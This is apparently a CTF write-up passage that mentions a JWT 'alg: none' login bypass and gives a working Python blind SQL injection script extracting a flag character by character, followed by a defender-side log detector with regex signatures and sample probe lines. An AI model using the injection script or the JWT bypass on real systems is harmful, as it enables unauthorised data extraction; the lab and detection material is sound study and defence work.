Got halfway and got stuck; I'll come back to it another time. Spent a lot of time on it, but learning to construct the negation bypass was worthwhile.
At first I thought it was session forgery, then realised I had done it wrong; I also added escape characters and didn't know what to do. After reading other people's writeups: the trick is changing the encryption algorithm to none to bypass it.

[HFCTF2020]EasyLogin
Not too hard.
```python
import requests
import time

url = "http://b8c664e5-963f-4117-9a97-9ba6567e2a49.node3.buuoj.cn/index.php"
result = ''
i = 0
while True:
    i = i + 1
    # printable ASCII range for the binary search
    head = 32
    tail = 127
    # binary-search the ASCII value of the i-th character of the flag
    while head < tail:
        mid = (head + tail) >> 1
        # "0^if(...)" uses XOR instead of AND/OR as the boolean condition
        payload = {
            'id': f'0^if(ascii(substr((select(flag)from(flag)),({i}),(1)))>{mid},1,0)'
        }
        r = requests.post(url, data=payload)
        print(r.text)
        # the "true" page text is the oracle
        if "glzjin wants a girlfriend" in r.text:
            head = mid + 1
        else:
            tail = mid
        time.sleep(0.2)
    # past the end of the flag, ascii(substr(...)) is 0 and head never moves
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
```
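The script above sends one request per binary-search step, each with the same `0^if(ascii(substr(` payload shape. As an added example (not from the original post), here is a defender-side detector that parses constructed application log lines in a hypothetical `<ip> <unix_ts> <method> <path> <body>` format and flags any source sending a burst of such boolean-blind probes inside a short time window.

```python
import re
from collections import defaultdict

# Constructed sample log; the format "<ip> <unix_ts> <method> <path> <body>" is hypothetical.
SAMPLE_LOG = """\
10.0.0.5 1700000000 POST /index.php id=0^if(ascii(substr((select(flag)from(flag)),(1),(1)))>79,1,0)
10.0.0.5 1700000001 POST /index.php id=0^if(ascii(substr((select(flag)from(flag)),(1),(1)))>103,1,0)
10.0.0.5 1700000001 POST /index.php id=0^if(ascii(substr((select(flag)from(flag)),(1),(1)))>91,1,0)
10.0.0.5 1700000002 POST /index.php id=0^if(ascii(substr((select(flag)from(flag)),(1),(1)))>97,1,0)
10.0.0.5 1700000002 POST /index.php id=0^if(ascii(substr((select(flag)from(flag)),(1),(1)))>100,1,0)
10.0.0.5 1700000003 POST /index.php id=0^if(ascii(substr((select(flag)from(flag)),(1),(1)))>102,1,0)
192.168.1.9 1700000003 POST /index.php id=42
192.168.1.9 1700000004 POST /index.php id=7
"""

# Signatures of the probe used above: a conditional wrapped around ascii(substr(...)),
# or the arithmetic "0^if(" / "0|if(" form that avoids the AND/OR keywords.
PROBE = re.compile(r"(?i)(?:\d\s*[\^|]\s*if\s*\(|if\s*\(\s*ascii\s*\(\s*substr\s*\()")
LINE = re.compile(r"^(\S+) (\d+) (\S+) (\S+) (.*)$")

def parse_line(line):
    """Split one log line into fields; return None for lines that do not match the format."""
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, method, path, body = m.groups()
    return {"ip": ip, "ts": int(ts), "method": method, "path": path, "body": body}

def flag_blind_sqli(log_text, window=10, threshold=5):
    """Return {ip: count} for sources that sent >= threshold probe requests within `window` seconds."""
    probes = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec and PROBE.search(rec["body"]):
            probes[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in probes.items():
        stamps.sort()
        best, lo = 0, 0
        # sliding window: largest number of probes in any `window`-second span
        for hi in range(len(stamps)):
            while stamps[hi] - stamps[lo] > window:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

if __name__ == "__main__":
    print(flag_blind_sqli(SAMPLE_LOG))
```

The threshold and window are tuning knobs; a real deployment would feed it request bodies from an application or WAF log, since the payload travels in the POST body rather than the URL.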